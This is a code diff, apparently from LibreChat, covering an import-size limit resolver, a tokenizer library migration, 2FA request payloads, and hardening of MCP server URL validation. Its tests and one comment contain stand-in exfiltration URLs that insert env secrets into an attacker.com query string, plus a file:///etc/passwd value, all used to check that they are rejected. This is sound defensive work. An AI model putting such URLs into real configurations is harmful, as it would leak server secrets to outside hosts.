process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'abc';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for negative values', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '-100';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for zero', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '0';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
it('falls back to default and warns for Infinity', () => {
process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'Infinity';
expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE);
expect(logger.warn).toHaveBeenCalledWith(
expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'),
);
});
});

View file

@ -0,0 +1,20 @@
import { logger } from '@librechat/data-schemas';
/** 250 MiB — default max file size for conversation imports */
export const DEFAULT_IMPORT_MAX_FILE_SIZE = 262144000;
/** Resolves the import file-size limit from the env var, falling back to the 250 MiB default */
export function resolveImportMaxFileSize(): number {
const raw = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES;
if (!raw) {
return DEFAULT_IMPORT_MAX_FILE_SIZE;
}
const parsed = Number(raw);
if (!Number.isFinite(parsed) || parsed <= 0) {
logger.warn(
`[imports] Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES="${raw}"; using default ${DEFAULT_IMPORT_MAX_FILE_SIZE}`,
);
return DEFAULT_IMPORT_MAX_FILE_SIZE;
}
return parsed;
}

View file

@ -6,6 +6,7 @@ export * from './email';
export * from './env'; export * from './env';
export * from './events'; export * from './events';
export * from './files'; export * from './files';
export * from './import';
export * from './generators'; export * from './generators';
export * from './graph'; export * from './graph';
export * from './path'; export * from './path';
@ -19,7 +20,6 @@ export * from './promise';
export * from './sanitizeTitle'; export * from './sanitizeTitle';
export * from './tempChatRetention'; export * from './tempChatRetention';
export * from './text'; export * from './text';
export { default as Tokenizer, countTokens } from './tokenizer';
export * from './yaml'; export * from './yaml';
export * from './http'; export * from './http';
export * from './tokens'; export * from './tokens';

View file

@ -65,7 +65,7 @@ const createRealTokenCounter = () => {
let callCount = 0; let callCount = 0;
const tokenCountFn = (text: string): number => { const tokenCountFn = (text: string): number => {
callCount++; callCount++;
return Tokenizer.getTokenCount(text, 'cl100k_base'); return Tokenizer.getTokenCount(text, 'o200k_base');
}; };
return { return {
tokenCountFn, tokenCountFn,
@ -590,9 +590,9 @@ describe('processTextWithTokenLimit', () => {
}); });
}); });
describe('direct comparison with REAL tiktoken tokenizer', () => { describe('direct comparison with REAL ai-tokenizer', () => {
beforeEach(() => { beforeAll(async () => {
Tokenizer.freeAndResetAllEncoders(); await Tokenizer.initEncoding('o200k_base');
}); });
it('should produce valid truncation with real tokenizer', async () => { it('should produce valid truncation with real tokenizer', async () => {
@ -611,7 +611,7 @@ describe('processTextWithTokenLimit', () => {
expect(result.text.length).toBeLessThan(text.length); expect(result.text.length).toBeLessThan(text.length);
}); });
it('should use fewer tiktoken calls than old implementation (realistic text)', async () => { it('should use fewer tokenizer calls than old implementation (realistic text)', async () => {
const oldCounter = createRealTokenCounter(); const oldCounter = createRealTokenCounter();
const newCounter = createRealTokenCounter(); const newCounter = createRealTokenCounter();
const text = createRealisticText(15000); const text = createRealisticText(15000);
@ -623,8 +623,6 @@ describe('processTextWithTokenLimit', () => {
tokenCountFn: oldCounter.tokenCountFn, tokenCountFn: oldCounter.tokenCountFn,
}); });
Tokenizer.freeAndResetAllEncoders();
await processTextWithTokenLimit({ await processTextWithTokenLimit({
text, text,
tokenLimit, tokenLimit,
@ -634,17 +632,17 @@ describe('processTextWithTokenLimit', () => {
const oldCalls = oldCounter.getCallCount(); const oldCalls = oldCounter.getCallCount();
const newCalls = newCounter.getCallCount(); const newCalls = newCounter.getCallCount();
console.log(`[Real tiktoken ~15k tokens] OLD: ${oldCalls} calls, NEW: ${newCalls} calls`); console.log(`[Real tokenizer ~15k tokens] OLD: ${oldCalls} calls, NEW: ${newCalls} calls`);
console.log(`[Real tiktoken] Reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`); console.log(`[Real tokenizer] Reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
expect(newCalls).toBeLessThan(oldCalls); expect(newCalls).toBeLessThan(oldCalls);
}); });
it('should handle the reported user scenario with real tokenizer (~120k tokens)', async () => { it('should handle large text with real tokenizer (~20k tokens)', async () => {
const oldCounter = createRealTokenCounter(); const oldCounter = createRealTokenCounter();
const newCounter = createRealTokenCounter(); const newCounter = createRealTokenCounter();
const text = createRealisticText(120000); const text = createRealisticText(20000);
const tokenLimit = 100000; const tokenLimit = 15000;
const startOld = performance.now(); const startOld = performance.now();
await processTextWithTokenLimitOLD({ await processTextWithTokenLimitOLD({
@ -654,8 +652,6 @@ describe('processTextWithTokenLimit', () => {
}); });
const timeOld = performance.now() - startOld; const timeOld = performance.now() - startOld;
Tokenizer.freeAndResetAllEncoders();
const startNew = performance.now(); const startNew = performance.now();
const result = await processTextWithTokenLimit({ const result = await processTextWithTokenLimit({
text, text,
@ -667,9 +663,9 @@ describe('processTextWithTokenLimit', () => {
const oldCalls = oldCounter.getCallCount(); const oldCalls = oldCounter.getCallCount();
const newCalls = newCounter.getCallCount(); const newCalls = newCounter.getCallCount();
console.log(`\n[REAL TIKTOKEN - User reported scenario: ~120k tokens]`); console.log(`\n[REAL TOKENIZER - ~20k tokens]`);
console.log(`OLD implementation: ${oldCalls} tiktoken calls, ${timeOld.toFixed(0)}ms`); console.log(`OLD implementation: ${oldCalls} tokenizer calls, ${timeOld.toFixed(0)}ms`);
console.log(`NEW implementation: ${newCalls} tiktoken calls, ${timeNew.toFixed(0)}ms`); console.log(`NEW implementation: ${newCalls} tokenizer calls, ${timeNew.toFixed(0)}ms`);
console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`); console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
console.log(`Time reduction: ${((1 - timeNew / timeOld) * 100).toFixed(1)}%`); console.log(`Time reduction: ${((1 - timeNew / timeOld) * 100).toFixed(1)}%`);
console.log( console.log(
@ -684,8 +680,8 @@ describe('processTextWithTokenLimit', () => {
it('should achieve at least 70% reduction with real tokenizer', async () => { it('should achieve at least 70% reduction with real tokenizer', async () => {
const oldCounter = createRealTokenCounter(); const oldCounter = createRealTokenCounter();
const newCounter = createRealTokenCounter(); const newCounter = createRealTokenCounter();
const text = createRealisticText(50000); const text = createRealisticText(15000);
const tokenLimit = 10000; const tokenLimit = 5000;
await processTextWithTokenLimitOLD({ await processTextWithTokenLimitOLD({
text, text,
@ -693,8 +689,6 @@ describe('processTextWithTokenLimit', () => {
tokenCountFn: oldCounter.tokenCountFn, tokenCountFn: oldCounter.tokenCountFn,
}); });
Tokenizer.freeAndResetAllEncoders();
await processTextWithTokenLimit({ await processTextWithTokenLimit({
text, text,
tokenLimit, tokenLimit,
@ -706,7 +700,7 @@ describe('processTextWithTokenLimit', () => {
const reduction = 1 - newCalls / oldCalls; const reduction = 1 - newCalls / oldCalls;
console.log( console.log(
`[Real tiktoken 50k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`, `[Real tokenizer 15k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
); );
expect(reduction).toBeGreaterThanOrEqual(0.7); expect(reduction).toBeGreaterThanOrEqual(0.7);
@ -714,10 +708,6 @@ describe('processTextWithTokenLimit', () => {
}); });
describe('using countTokens async function from @librechat/api', () => { describe('using countTokens async function from @librechat/api', () => {
beforeEach(() => {
Tokenizer.freeAndResetAllEncoders();
});
it('countTokens should return correct token count', async () => { it('countTokens should return correct token count', async () => {
const text = 'Hello, world!'; const text = 'Hello, world!';
const count = await countTokens(text); const count = await countTokens(text);
@ -759,8 +749,6 @@ describe('processTextWithTokenLimit', () => {
tokenCountFn: oldCounter.tokenCountFn, tokenCountFn: oldCounter.tokenCountFn,
}); });
Tokenizer.freeAndResetAllEncoders();
await processTextWithTokenLimit({ await processTextWithTokenLimit({
text, text,
tokenLimit, tokenLimit,
@ -776,11 +764,11 @@ describe('processTextWithTokenLimit', () => {
expect(newCalls).toBeLessThan(oldCalls); expect(newCalls).toBeLessThan(oldCalls);
}); });
it('should handle user reported scenario with countTokens (~120k tokens)', async () => { it('should handle large text with countTokens (~20k tokens)', async () => {
const oldCounter = createCountTokensCounter(); const oldCounter = createCountTokensCounter();
const newCounter = createCountTokensCounter(); const newCounter = createCountTokensCounter();
const text = createRealisticText(120000); const text = createRealisticText(20000);
const tokenLimit = 100000; const tokenLimit = 15000;
const startOld = performance.now(); const startOld = performance.now();
await processTextWithTokenLimitOLD({ await processTextWithTokenLimitOLD({
@ -790,8 +778,6 @@ describe('processTextWithTokenLimit', () => {
}); });
const timeOld = performance.now() - startOld; const timeOld = performance.now() - startOld;
Tokenizer.freeAndResetAllEncoders();
const startNew = performance.now(); const startNew = performance.now();
const result = await processTextWithTokenLimit({ const result = await processTextWithTokenLimit({
text, text,
@ -803,7 +789,7 @@ describe('processTextWithTokenLimit', () => {
const oldCalls = oldCounter.getCallCount(); const oldCalls = oldCounter.getCallCount();
const newCalls = newCounter.getCallCount(); const newCalls = newCounter.getCallCount();
console.log(`\n[countTokens - User reported scenario: ~120k tokens]`); console.log(`\n[countTokens - ~20k tokens]`);
console.log(`OLD implementation: ${oldCalls} countTokens calls, ${timeOld.toFixed(0)}ms`); console.log(`OLD implementation: ${oldCalls} countTokens calls, ${timeOld.toFixed(0)}ms`);
console.log(`NEW implementation: ${newCalls} countTokens calls, ${timeNew.toFixed(0)}ms`); console.log(`NEW implementation: ${newCalls} countTokens calls, ${timeNew.toFixed(0)}ms`);
console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`); console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
@ -820,8 +806,8 @@ describe('processTextWithTokenLimit', () => {
it('should achieve at least 70% reduction with countTokens', async () => { it('should achieve at least 70% reduction with countTokens', async () => {
const oldCounter = createCountTokensCounter(); const oldCounter = createCountTokensCounter();
const newCounter = createCountTokensCounter(); const newCounter = createCountTokensCounter();
const text = createRealisticText(50000); const text = createRealisticText(15000);
const tokenLimit = 10000; const tokenLimit = 5000;
await processTextWithTokenLimitOLD({ await processTextWithTokenLimitOLD({
text, text,
@ -829,8 +815,6 @@ describe('processTextWithTokenLimit', () => {
tokenCountFn: oldCounter.tokenCountFn, tokenCountFn: oldCounter.tokenCountFn,
}); });
Tokenizer.freeAndResetAllEncoders();
await processTextWithTokenLimit({ await processTextWithTokenLimit({
text, text,
tokenLimit, tokenLimit,
@ -842,7 +826,7 @@ describe('processTextWithTokenLimit', () => {
const reduction = 1 - newCalls / oldCalls; const reduction = 1 - newCalls / oldCalls;
console.log( console.log(
`[countTokens 50k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`, `[countTokens 15k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
); );
expect(reduction).toBeGreaterThanOrEqual(0.7); expect(reduction).toBeGreaterThanOrEqual(0.7);

View file

@ -1,12 +1,3 @@
/**
* @file Tokenizer.spec.cjs
*
* Tests the real TokenizerSingleton (no mocking of `tiktoken`).
* Make sure to install `tiktoken` and have it configured properly.
*/
import { logger } from '@librechat/data-schemas';
import type { Tiktoken } from 'tiktoken';
import Tokenizer from './tokenizer'; import Tokenizer from './tokenizer';
jest.mock('@librechat/data-schemas', () => ({ jest.mock('@librechat/data-schemas', () => ({
@ -17,127 +8,49 @@ jest.mock('@librechat/data-schemas', () => ({
describe('Tokenizer', () => { describe('Tokenizer', () => {
it('should be a singleton (same instance)', async () => { it('should be a singleton (same instance)', async () => {
const AnotherTokenizer = await import('./tokenizer'); // same path const AnotherTokenizer = await import('./tokenizer');
expect(Tokenizer).toBe(AnotherTokenizer.default); expect(Tokenizer).toBe(AnotherTokenizer.default);
}); });
describe('getTokenizer', () => { describe('initEncoding', () => {
it('should create an encoder for an explicit model name (e.g., "gpt-4")', () => { it('should load o200k_base encoding', async () => {
// The real `encoding_for_model` will be called internally await Tokenizer.initEncoding('o200k_base');
// as soon as we pass isModelName = true. const count = Tokenizer.getTokenCount('Hello, world!', 'o200k_base');
const tokenizer = Tokenizer.getTokenizer('gpt-4', true); expect(count).toBeGreaterThan(0);
// Basic sanity checks
expect(tokenizer).toBeDefined();
// You can optionally check certain properties from `tiktoken` if they exist
// e.g., expect(typeof tokenizer.encode).toBe('function');
}); });
it('should create an encoder for a known encoding (e.g., "cl100k_base")', () => { it('should load claude encoding', async () => {
// The real `get_encoding` will be called internally await Tokenizer.initEncoding('claude');
// as soon as we pass isModelName = false. const count = Tokenizer.getTokenCount('Hello, world!', 'claude');
const tokenizer = Tokenizer.getTokenizer('cl100k_base', false); expect(count).toBeGreaterThan(0);
expect(tokenizer).toBeDefined();
// e.g., expect(typeof tokenizer.encode).toBe('function');
}); });
it('should return cached tokenizer if previously fetched', () => { it('should deduplicate concurrent init calls', async () => {
const tokenizer1 = Tokenizer.getTokenizer('cl100k_base', false); const [, , count] = await Promise.all([
const tokenizer2 = Tokenizer.getTokenizer('cl100k_base', false); Tokenizer.initEncoding('o200k_base'),
// Should be the exact same instance from the cache Tokenizer.initEncoding('o200k_base'),
expect(tokenizer1).toBe(tokenizer2); Tokenizer.initEncoding('o200k_base').then(() =>
}); Tokenizer.getTokenCount('test', 'o200k_base'),
}); ),
]);
describe('freeAndResetAllEncoders', () => { expect(count).toBeGreaterThan(0);
beforeEach(() => {
jest.clearAllMocks();
});
it('should free all encoders and reset tokenizerCallsCount to 1', () => {
// By creating two different encodings, we populate the cache
Tokenizer.getTokenizer('cl100k_base', false);
Tokenizer.getTokenizer('r50k_base', false);
// Now free them
Tokenizer.freeAndResetAllEncoders();
// The internal cache is cleared
expect(Tokenizer.tokenizersCache['cl100k_base']).toBeUndefined();
expect(Tokenizer.tokenizersCache['r50k_base']).toBeUndefined();
// tokenizerCallsCount is reset to 1
expect(Tokenizer.tokenizerCallsCount).toBe(1);
});
it('should catch and log errors if freeing fails', () => {
// Mock logger.error before the test
const mockLoggerError = jest.spyOn(logger, 'error');
// Set up a problematic tokenizer in the cache
Tokenizer.tokenizersCache['cl100k_base'] = {
free() {
throw new Error('Intentional free error');
},
} as unknown as Tiktoken;
// Should not throw uncaught errors
Tokenizer.freeAndResetAllEncoders();
// Verify logger.error was called with correct arguments
expect(mockLoggerError).toHaveBeenCalledWith(
'[Tokenizer] Free and reset encoders error',
expect.any(Error),
);
// Clean up
mockLoggerError.mockRestore();
Tokenizer.tokenizersCache = {};
}); });
}); });
describe('getTokenCount', () => { describe('getTokenCount', () => {
beforeEach(() => { beforeAll(async () => {
jest.clearAllMocks(); await Tokenizer.initEncoding('o200k_base');
Tokenizer.freeAndResetAllEncoders(); await Tokenizer.initEncoding('claude');
}); });
it('should return the number of tokens in the given text', () => { it('should return the number of tokens in the given text', () => {
const text = 'Hello, world!'; const count = Tokenizer.getTokenCount('Hello, world!', 'o200k_base');
const count = Tokenizer.getTokenCount(text, 'cl100k_base');
expect(count).toBeGreaterThan(0); expect(count).toBeGreaterThan(0);
}); });
it('should reset encoders if an error is thrown', () => { it('should count tokens using claude encoding', () => {
// We can simulate an error by temporarily overriding the selected tokenizer's `encode` method. const count = Tokenizer.getTokenCount('Hello, world!', 'claude');
const tokenizer = Tokenizer.getTokenizer('cl100k_base', false);
const originalEncode = tokenizer.encode;
tokenizer.encode = () => {
throw new Error('Forced error');
};
// Despite the forced error, the code should catch and reset, then re-encode
const count = Tokenizer.getTokenCount('Hello again', 'cl100k_base');
expect(count).toBeGreaterThan(0); expect(count).toBeGreaterThan(0);
// Restore the original encode
tokenizer.encode = originalEncode;
});
it('should reset tokenizers after 25 calls', () => {
// Spy on freeAndResetAllEncoders
const resetSpy = jest.spyOn(Tokenizer, 'freeAndResetAllEncoders');
// Make 24 calls; should NOT reset yet
for (let i = 0; i < 24; i++) {
Tokenizer.getTokenCount('test text', 'cl100k_base');
}
expect(resetSpy).not.toHaveBeenCalled();
// 25th call triggers the reset
Tokenizer.getTokenCount('the 25th call!', 'cl100k_base');
expect(resetSpy).toHaveBeenCalledTimes(1);
}); });
}); });
}); });

View file

@ -1,74 +1,46 @@
import { logger } from '@librechat/data-schemas'; import { logger } from '@librechat/data-schemas';
import { encoding_for_model as encodingForModel, get_encoding as getEncoding } from 'tiktoken'; import { Tokenizer as AiTokenizer } from 'ai-tokenizer';
import type { Tiktoken, TiktokenModel, TiktokenEncoding } from 'tiktoken';
interface TokenizerOptions { export type EncodingName = 'o200k_base' | 'claude';
debug?: boolean;
} type EncodingData = ConstructorParameters<typeof AiTokenizer>[0];
class Tokenizer { class Tokenizer {
tokenizersCache: Record<string, Tiktoken>; private tokenizersCache: Partial<Record<EncodingName, AiTokenizer>> = {};
tokenizerCallsCount: number; private loadingPromises: Partial<Record<EncodingName, Promise<void>>> = {};
private options?: TokenizerOptions;
constructor() { /** Pre-loads an encoding so that subsequent getTokenCount calls are accurate. */
this.tokenizersCache = {}; async initEncoding(encoding: EncodingName): Promise<void> {
this.tokenizerCallsCount = 0;
}
getTokenizer(
encoding: TiktokenModel | TiktokenEncoding,
isModelName = false,
extendSpecialTokens: Record<string, number> = {},
): Tiktoken {
let tokenizer: Tiktoken;
if (this.tokenizersCache[encoding]) { if (this.tokenizersCache[encoding]) {
tokenizer = this.tokenizersCache[encoding]; return;
} else {
if (isModelName) {
tokenizer = encodingForModel(encoding as TiktokenModel, extendSpecialTokens);
} else {
tokenizer = getEncoding(encoding as TiktokenEncoding, extendSpecialTokens);
} }
this.tokenizersCache[encoding] = tokenizer; if (this.loadingPromises[encoding]) {
return this.loadingPromises[encoding];
} }
return tokenizer; this.loadingPromises[encoding] = (async () => {
const data: EncodingData =
encoding === 'claude'
? await import('ai-tokenizer/encoding/claude')
: await import('ai-tokenizer/encoding/o200k_base');
this.tokenizersCache[encoding] = new AiTokenizer(data);
})();
return this.loadingPromises[encoding];
} }
freeAndResetAllEncoders(): void { getTokenCount(text: string, encoding: EncodingName = 'o200k_base'): number {
const tokenizer = this.tokenizersCache[encoding];
if (!tokenizer) {
this.initEncoding(encoding);
return Math.ceil(text.length / 4);
}
try { try {
Object.keys(this.tokenizersCache).forEach((key) => { return tokenizer.count(text);
if (this.tokenizersCache[key]) {
this.tokenizersCache[key].free();
delete this.tokenizersCache[key];
}
});
this.tokenizerCallsCount = 1;
} catch (error) {
logger.error('[Tokenizer] Free and reset encoders error', error);
}
}
resetTokenizersIfNecessary(): void {
if (this.tokenizerCallsCount >= 25) {
if (this.options?.debug) {
logger.debug('[Tokenizer] freeAndResetAllEncoders: reached 25 encodings, resetting...');
}
this.freeAndResetAllEncoders();
}
this.tokenizerCallsCount++;
}
getTokenCount(text: string, encoding: TiktokenModel | TiktokenEncoding = 'cl100k_base'): number {
this.resetTokenizersIfNecessary();
try {
const tokenizer = this.getTokenizer(encoding);
return tokenizer.encode(text, 'all').length;
} catch (error) { } catch (error) {
logger.error('[Tokenizer] Error getting token count:', error); logger.error('[Tokenizer] Error getting token count:', error);
this.freeAndResetAllEncoders(); delete this.tokenizersCache[encoding];
const tokenizer = this.getTokenizer(encoding); delete this.loadingPromises[encoding];
return tokenizer.encode(text, 'all').length; this.initEncoding(encoding);
return Math.ceil(text.length / 4);
} }
} }
} }
@ -76,13 +48,13 @@ class Tokenizer {
const TokenizerSingleton = new Tokenizer(); const TokenizerSingleton = new Tokenizer();
/** /**
* Counts the number of tokens in a given text using tiktoken. * Counts the number of tokens in a given text using ai-tokenizer with o200k_base encoding.
* This is an async wrapper around Tokenizer.getTokenCount for compatibility. * @param text - The text to count tokens in. Defaults to an empty string.
* @param text - The text to be tokenized. Defaults to an empty string if not provided.
* @returns The number of tokens in the provided text. * @returns The number of tokens in the provided text.
*/ */
export async function countTokens(text = ''): Promise<number> { export async function countTokens(text = ''): Promise<number> {
return TokenizerSingleton.getTokenCount(text, 'cl100k_base'); await TokenizerSingleton.initEncoding('o200k_base');
return TokenizerSingleton.getTokenCount(text, 'o200k_base');
} }
export default TokenizerSingleton; export default TokenizerSingleton;

View file

@ -593,42 +593,3 @@ export function processModelData(input: z.infer<typeof inputSchema>): EndpointTo
return tokenConfig; return tokenConfig;
} }
export const tiktokenModels = new Set([
'text-davinci-003',
'text-davinci-002',
'text-davinci-001',
'text-curie-001',
'text-babbage-001',
'text-ada-001',
'davinci',
'curie',
'babbage',
'ada',
'code-davinci-002',
'code-davinci-001',
'code-cushman-002',
'code-cushman-001',
'davinci-codex',
'cushman-codex',
'text-davinci-edit-001',
'code-davinci-edit-001',
'text-embedding-ada-002',
'text-similarity-davinci-001',
'text-similarity-curie-001',
'text-similarity-babbage-001',
'text-similarity-ada-001',
'text-search-davinci-doc-001',
'text-search-curie-doc-001',
'text-search-babbage-doc-001',
'text-search-ada-doc-001',
'code-search-babbage-code-001',
'code-search-ada-code-001',
'gpt2',
'gpt-4',
'gpt-4-0314',
'gpt-4-32k',
'gpt-4-32k-0314',
'gpt-3.5-turbo',
'gpt-3.5-turbo-0301',
]);

View file

@ -0,0 +1,147 @@
import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp';
describe('MCPServerUserInputSchema', () => {
describe('env variable exfiltration prevention', () => {
it('should confirm admin schema resolves env vars (attack vector baseline)', () => {
process.env.FAKE_SECRET = 'leaked-secret-value';
const adminResult = SSEOptionsSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(adminResult.success).toBe(true);
if (adminResult.success) {
expect(adminResult.data.url).toContain('leaked-secret-value');
}
delete process.env.FAKE_SECRET;
});
it('should reject the same URL through user input schema', () => {
process.env.FAKE_SECRET = 'leaked-secret-value';
const userResult = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(userResult.success).toBe(false);
delete process.env.FAKE_SECRET;
});
});
describe('env variable rejection', () => {
it('should reject SSE URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(result.success).toBe(false);
});
it('should reject streamable-http URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'http://attacker.com/?jwt=${JWT_SECRET}',
});
expect(result.success).toBe(false);
});
it('should reject WebSocket URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'ws://attacker.com/?secret=${FAKE_SECRET}',
});
expect(result.success).toBe(false);
});
});
describe('protocol allowlisting', () => {
it('should reject file:// URLs for SSE', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'file:///etc/passwd',
});
expect(result.success).toBe(false);
});
it('should reject ftp:// URLs for streamable-http', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'ftp://internal-server/data',
});
expect(result.success).toBe(false);
});
it('should reject http:// URLs for WebSocket', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'http://example.com/ws',
});
expect(result.success).toBe(false);
});
it('should reject ws:// URLs for SSE', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'ws://example.com/sse',
});
expect(result.success).toBe(false);
});
});
describe('valid URL acceptance', () => {
it('should accept valid https:// SSE URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'https://mcp-server.com/sse',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('https://mcp-server.com/sse');
}
});
it('should accept valid http:// SSE URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://mcp-server.com/sse',
});
expect(result.success).toBe(true);
});
it('should accept valid wss:// WebSocket URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'wss://mcp-server.com/ws',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('wss://mcp-server.com/ws');
}
});
it('should accept valid ws:// WebSocket URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'ws://mcp-server.com/ws',
});
expect(result.success).toBe(true);
});
it('should accept valid https:// streamable-http URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'https://mcp-server.com/http',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('https://mcp-server.com/http');
}
});
it('should accept valid http:// streamable-http URLs with "http" alias', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'http',
url: 'http://mcp-server.com/mcp',
});
expect(result.success).toBe(true);
});
});
});

View file

@ -21,8 +21,8 @@ export function revokeAllUserKeys(): Promise<unknown> {
return request.delete(endpoints.revokeAllUserKeys()); return request.delete(endpoints.revokeAllUserKeys());
} }
export function deleteUser(): Promise<s.TPreset> { export function deleteUser(payload?: t.TDeleteUserRequest): Promise<unknown> {
return request.delete(endpoints.deleteUser()); return request.deleteWithOptions(endpoints.deleteUser(), { data: payload });
} }
export type FavoriteItem = { export type FavoriteItem = {
@ -970,8 +970,8 @@ export function updateFeedback(
} }
// 2FA // 2FA
export function enableTwoFactor(): Promise<t.TEnable2FAResponse> { export function enableTwoFactor(payload?: t.TEnable2FARequest): Promise<t.TEnable2FAResponse> {
return request.get(endpoints.enableTwoFactor()); return request.post(endpoints.enableTwoFactor(), payload);
} }
export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise<t.TVerify2FAResponse> { export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise<t.TVerify2FAResponse> {
@ -986,8 +986,10 @@ export function disableTwoFactor(payload?: t.TDisable2FARequest): Promise<t.TDis
return request.post(endpoints.disableTwoFactor(), payload); return request.post(endpoints.disableTwoFactor(), payload);
} }
export function regenerateBackupCodes(): Promise<t.TRegenerateBackupCodesResponse> { export function regenerateBackupCodes(
return request.post(endpoints.regenerateBackupCodes()); payload?: t.TRegenerateBackupCodesRequest,
): Promise<t.TRegenerateBackupCodesResponse> {
return request.post(endpoints.regenerateBackupCodes(), payload);
} }
export function verifyTwoFactorTemp( export function verifyTwoFactorTemp(

View file

@ -223,6 +223,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
oauth_headers: true, oauth_headers: true,
}); });
const envVarPattern = /\$\{[^}]+\}/;
const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val);
const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val);
/**
* Builds a URL schema for user input that rejects ${VAR} env variable patterns
* and validates protocol constraints without resolving environment variables.
*/
const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) =>
z
.string()
.refine((val) => !envVarPattern.test(val), {
message: 'Environment variable references are not allowed in URLs',
})
.pipe(z.string().url())
.refine(protocolCheck, { message });
/** /**
* MCP Server configuration that comes from UI/API input only. * MCP Server configuration that comes from UI/API input only.
* Omits server-managed fields like startup, timeout, customUserVars, etc. * Omits server-managed fields like startup, timeout, customUserVars, etc.
@ -232,11 +249,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
* Stdio allows arbitrary command execution and should only be configured * Stdio allows arbitrary command execution and should only be configured
* by administrators via the YAML config file (librechat.yaml). * by administrators via the YAML config file (librechat.yaml).
* Only remote transports (SSE, HTTP, WebSocket) are allowed via the API. * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API.
*
* SECURITY: URL fields use userUrlSchema instead of the admin schemas'
* extractEnvVariable transform to prevent env variable exfiltration
* through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}).
* Protocol checks use positive allowlists (http(s) / ws(s)) to block
* file://, ftp://, javascript:, and other non-network schemes.
*/ */
export const MCPServerUserInputSchema = z.union([ export const MCPServerUserInputSchema = z.union([
omitServerManagedFields(WebSocketOptionsSchema), omitServerManagedFields(WebSocketOptionsSchema).extend({
omitServerManagedFields(SSEOptionsSchema), url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'),
omitServerManagedFields(StreamableHTTPOptionsSchema), }),
omitServerManagedFields(SSEOptionsSchema).extend({
url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'),
}),
omitServerManagedFields(StreamableHTTPOptionsSchema).extend({
url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'),
}),
]); ]);
export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>; export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>;

View file

@ -425,28 +425,29 @@ export type TLoginResponse = {
tempToken?: string; tempToken?: string;
}; };
/** Shared payload for any operation that requires OTP or backup-code verification. */
export type TOTPVerificationPayload = {
token?: string;
backupCode?: string;
};
export type TEnable2FARequest = TOTPVerificationPayload;
